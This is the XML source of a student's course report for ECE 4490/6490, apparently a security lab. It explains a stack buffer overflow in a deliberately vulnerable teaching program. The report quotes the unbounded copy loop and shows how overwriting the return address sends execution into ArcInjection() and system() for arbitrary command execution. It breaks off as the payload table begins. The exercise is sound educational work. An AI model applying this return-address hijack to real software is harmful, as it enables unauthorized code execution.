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E3CA" w14:textId="2FA92DC0" w:rsidR="00E950D4" w:rsidRDefault="00E950D4">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Lorenzo Reyes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D84717" w14:textId="466D496E" w:rsidR="002A57EE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>ECE 4490/6490 — Assignment 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2BF301" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Buffer Overflow Exploit Report: Arbitrary Command Execution via </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>VulnerableLocalData(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3716494E" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRPr="00F339BF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="300" w:after="150"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F339BF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>1. Objective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D06FAF1" w14:textId="0C03C5D8" w:rsidR="002A57EE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This report demonstrates a working </w:t>
      </w:r>
      <w:r w:rsidR="00F339BF">
        <w:t>stack-based</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> buffer overflow against the course provided VulnerableCode_2.exe. The exploit progresses from control of the saved return address to execution of a chosen command through </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>system(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">). By overflowing the local buffer in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>VulnerableLocalData(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">), the payload overwrites the saved frame pointer and return address, redirects execution to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ArcInjection(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">), and supplies the argument that </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ArcInjection(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">) passes to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>system(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD5E5F0" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRPr="00F339BF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="300" w:after="150"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F339BF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>2. Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE301BB" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Target: VulnerableCode_2.exe, compiled from Dr. Brooks's VulnerableCode_2.c with gcc -ggdb -O0 -Wall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC618BC" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Platform: Windows XP, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>32 bit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>, 512 MB RAM, no ASLR, running in the course provided VirtualBox image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AFA7CF" w14:textId="799C63E0" w:rsidR="002A57EE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Shell and toolchain: Cygwin with gcc, gdb 6.8.0, od, printf, head, seq, and tr.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC57CED" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Debugger: GDB 6.8.0-cygwin-special, used through both the command line interface and the bundled Insight GUI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5669EF" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload construction: raw binary payloads were created with head -c, printf '\xNN', and shell append (&gt;&gt;). This matches the target program's behavior, which reads the input as a sequence of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>4 byte</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> integer values without byte swapping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2AEDDD" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRPr="00F339BF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="300" w:after="150"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F339BF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>3. The Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF3EA75" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>VulnerableCode_2.c contains several intentionally unsafe execution paths. The exploit in this report targets the path selected by command line argument "2":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57768D07" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:spacing w:before="80" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>case 2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  VulnerableLocalData(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>argc,argv</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0D2F90" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>VulnerableLocalData(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">) allocates a fixed size local array and passes it to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>EnterDataToVulnerableBuffer(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">). That function copies data from an </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>attacker controlled</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file into the array without checking whether the destination still has available space:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E6A856" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:spacing w:before="80" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">void </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>VulnerableLocalData(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>int argc, char **argv) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  int </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>BufOve[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>14];</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  EnterDataToVulnerableBuffer(BufOve, argc, argv);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">void </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>EnterDataToVulnerableBuffer(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>int *</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>Buffer,int</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>argc,char</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> **argv) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  while(read(f</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>1,&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>TempChar,4)&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>0){</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">     Buffer[i+</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">+]=TempChar;   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>// no bounds check against Buffer's size</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D4E35A" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The input loop continues reading </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>4 byte</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> values until the file is exhausted. Because it never checks the size of BufOve, input longer than the local array continues into adjacent stack data. In the observed stack frame, the overflow reaches the saved EBP and then the saved return address, allowing the return target of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>VulnerableLocalData(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>) to be replaced.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3722D40E" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">No injected shellcode is required for this exploit. Instead, control flow is redirected to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ArcInjection(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>), a function that already exists in the executable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2DE731" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:spacing w:before="80" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">void </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>ArcInjection(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>char *R) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  printf("In ArcInjection</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>()\</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>n");</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  system(R);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520B0EED" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The technique is conceptually similar to return to libc exploitation because it reuses executable code already present in the process rather than introducing new machine instructions. Here, the corrupted return address transfers execution to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ArcInjection(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">), while </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>attacker controlled</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> stack data supplies the argument that </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ArcInjection(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">) passes to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>system(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4888EC" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRPr="00F339BF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="300" w:after="150"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F339BF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>4. Key Technical Finding: the "Phantom Return Address" Slot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B96BA6" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The first successful EIP overwrite reached </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ArcInjection(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">), as confirmed by the program printing "In </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ArcInjection(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">)". The process still failed to execute the intended command, however. Inspection in GDB showed that the problem was the stack layout expected by </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ArcInjection(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6395B3" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ArcInjection(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">) is reached through a corrupted RET instruction rather than through a normal CALL. Under a normal function call, CALL places a return address on the stack before control enters the callee. After the callee establishes its stack frame, [ebp+4] contains that return address and [ebp+8] contains the first argument. The exploit does not perform that CALL. RET simply loads the overwritten return address into EIP and continues at </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ArcInjection(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">). As a result, the first 4 bytes following the overwritten return address occupy the position that </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ArcInjection(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>) expects to contain its own return address, and the next 4 bytes occupy the first argument position at [ebp+8].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D72B811" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The original payload placed the argument pointer immediately after the overwritten return address. That position was one stack word too early, so </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ArcInjection(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">) interpreted unrelated stack data as its argument. GDB showed this value resolving to the program's existing string "ls &gt;yada.dat" rather than to the intended command. Adding one </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>4 byte</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> placeholder between the overwritten return address and the argument pointer restored the expected stack layout. With that slot present, the pointer was read from [ebp+8] as intended.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550C14F4" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRPr="00F339BF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="300" w:after="150"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F339BF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>5. Final Payload Layout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8CB7FF" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The final payload used with ./VulnerableCode_2.exe 2 &lt;payload&gt; is organized as follows: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1239"/>
        <w:gridCol w:w="1819"/>
        <w:gridCol w:w="4095"/>
        <w:gridCol w:w="2293"/>
      </w:tblGrid>
      <w:tr w:rsidR="002A57EE" w14:paraId="138C159E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
          </w:tcPr>
          <w:p w14:paraId="707B85EE" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Offset (bytes)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
          </w:tcPr>
          <w:p w14:paraId="4DCDE290" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
          </w:tcPr>
